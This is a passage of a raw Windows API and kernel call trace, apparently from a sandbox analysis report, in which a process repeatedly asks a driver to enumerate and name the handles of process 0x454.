returned 0x18a [0245.366] ObQueryNameString (in: Object=0xfffffa8003694730, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.366] ObfDereferenceObject (Object=0xfffffa8003694730) returned 0x2 [0245.366] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.366] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.366] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0245.366] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.366] PsAcquireProcessExitSynchronization () returned 0x0 [0245.366] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.366] ObReferenceObjectByHandle (in: Handle=0x7f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039e9f20, HandleInformation=0x0) returned 0x0 [0245.366] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.366] PsReleaseProcessExitSynchronization () returned 0x2 [0245.366] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.366] ObQueryNameString (in: Object=0xfffffa80039e9f20, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.366] ObfDereferenceObject (Object=0xfffffa80039e9f20) returned 0x2 [0245.367] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.367] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.367] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.367] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.367] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.367] PsAcquireProcessExitSynchronization () returned 0x0 [0245.367] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.367] ObReferenceObjectByHandle (in: Handle=0x854, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034eb920, HandleInformation=0x0) returned 0x0 [0245.367] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.367] PsReleaseProcessExitSynchronization () returned 0x2 [0245.367] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.367] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.367] ObfDereferenceObject (Object=0xfffffa80034eb920) returned 0x1 [0245.367] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.367] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.367] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.367] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.367] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.367] PsAcquireProcessExitSynchronization () returned 0x0 [0245.367] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.367] ObReferenceObjectByHandle (in: Handle=0x86c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029511f0, HandleInformation=0x0) returned 0x0 [0245.368] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.368] PsReleaseProcessExitSynchronization () returned 0x2 [0245.368] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.368] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.368] ObfDereferenceObject (Object=0xfffffa80029511f0) returned 0x1 [0245.368] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.368] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.368] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.368] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0245.368] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.368] PsAcquireProcessExitSynchronization () returned 0x0 [0245.368] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.368] ObReferenceObjectByHandle (in: Handle=0x87c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003adb1f0, HandleInformation=0x0) returned 0x0 [0245.368] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.368] PsReleaseProcessExitSynchronization () returned 0x2 [0245.368] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.368] ObQueryNameString (in: Object=0xfffffa8003adb1f0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.368] ObfDereferenceObject (Object=0xfffffa8003adb1f0) returned 0x10 [0245.368] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.368] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.368] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.368] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0245.368] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.368] PsAcquireProcessExitSynchronization () returned 0x0 [0245.368] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.369] ObReferenceObjectByHandle (in: Handle=0x8d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001edc240, HandleInformation=0x0) returned 0x0 [0245.369] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.369] PsReleaseProcessExitSynchronization () returned 0x2 [0245.369] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.369] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.369] ObfDereferenceObject (Object=0xfffffa8001edc240) returned 0x1 [0245.369] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.369] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.369] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.369] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.369] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.369] PsAcquireProcessExitSynchronization () returned 0x0 [0245.369] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.369] ObReferenceObjectByHandle (in: Handle=0x910, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0245.369] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.369] PsReleaseProcessExitSynchronization () returned 0x2 [0245.369] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.369] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.369] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x9 [0245.369] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.369] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.369] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.369] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.369] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.369] PsAcquireProcessExitSynchronization () returned 0x0 [0245.369] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.370] ObReferenceObjectByHandle (in: Handle=0x94c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f9c4a0, HandleInformation=0x0) returned 0x0 [0245.370] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.370] PsReleaseProcessExitSynchronization () returned 0x2 [0245.370] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.370] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.370] ObfDereferenceObject (Object=0xfffffa8001f9c4a0) returned 0x1 [0245.370] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.370] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.370] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.370] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.370] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.370] PsAcquireProcessExitSynchronization () returned 0x0 [0245.370] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.543] ObReferenceObjectByHandle (in: Handle=0x950, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003ab6070, HandleInformation=0x0) returned 0x0 [0245.543] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.544] PsReleaseProcessExitSynchronization () returned 0x2 [0245.544] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.544] ObQueryNameString (in: Object=0xfffffa8003ab6070, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.544] ObfDereferenceObject (Object=0xfffffa8003ab6070) returned 0x1 [0245.544] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.544] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.544] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.544] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0245.544] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.544] PsAcquireProcessExitSynchronization () returned 0x0 [0245.544] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.544] ObReferenceObjectByHandle (in: Handle=0x958, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0245.544] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.544] PsReleaseProcessExitSynchronization () returned 0x2 [0245.544] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.544] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.544] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xb [0245.544] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.544] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.544] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.544] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.544] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.544] PsAcquireProcessExitSynchronization () returned 0x0 [0245.544] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.544] ObReferenceObjectByHandle (in: Handle=0x980, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003525c70, HandleInformation=0x0) returned 0x0 [0245.545] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.545] PsReleaseProcessExitSynchronization () returned 0x2 [0245.545] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.545] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.545] ObfDereferenceObject (Object=0xfffffa8003525c70) returned 0x1 [0245.545] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.545] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.545] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.545] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0245.545] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.545] PsAcquireProcessExitSynchronization () returned 0x0 [0245.545] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.545] ObReferenceObjectByHandle (in: Handle=0x984, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003ab4cf0, HandleInformation=0x0) returned 0x0 [0245.545] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.545] PsReleaseProcessExitSynchronization () returned 0x2 [0245.545] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.545] ObQueryNameString (in: Object=0xfffffa8003ab4cf0, ObjectNameInfo=0xfffffa800306c7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306c7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.545] ObfDereferenceObject (Object=0xfffffa8003ab4cf0) returned 0x1 [0245.545] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.545] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.545] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.545] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.545] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.545] PsAcquireProcessExitSynchronization () returned 0x0 [0245.545] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.545] ObReferenceObjectByHandle (in: Handle=0x9f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a949e0, HandleInformation=0x0) returned 0x0 [0245.545] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.545] PsReleaseProcessExitSynchronization () returned 0x2 [0245.545] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.545] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.545] ObfDereferenceObject (Object=0xfffffa8003a949e0) returned 0x1 [0245.546] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.546] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.546] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.546] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.546] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.546] PsAcquireProcessExitSynchronization () returned 0x0 [0245.546] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.546] ObReferenceObjectByHandle (in: Handle=0xa20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a94890, HandleInformation=0x0) returned 0x0 [0245.546] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.546] PsReleaseProcessExitSynchronization () returned 0x2 [0245.546] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.546] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.546] ObfDereferenceObject (Object=0xfffffa8003a94890) returned 0x1 [0245.546] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.546] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.546] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.546] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.546] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.546] PsAcquireProcessExitSynchronization () returned 0x0 [0245.546] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.546] ObReferenceObjectByHandle (in: Handle=0xa34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039b5dd0, HandleInformation=0x0) returned 0x0 [0245.546] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.546] PsReleaseProcessExitSynchronization () returned 0x2 [0245.546] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.546] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.546] ObfDereferenceObject (Object=0xfffffa80039b5dd0) returned 0x1 [0245.546] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.547] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.547] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.547] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.547] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.547] PsAcquireProcessExitSynchronization () returned 0x0 [0245.547] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.547] ObReferenceObjectByHandle (in: Handle=0xa3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800399c230, HandleInformation=0x0) returned 0x0 [0245.547] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.547] PsReleaseProcessExitSynchronization () returned 0x2 [0245.547] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.547] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.547] ObfDereferenceObject (Object=0xfffffa800399c230) returned 0x1 [0245.547] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.547] HeapFree (in: hHeap=0x1b0000, 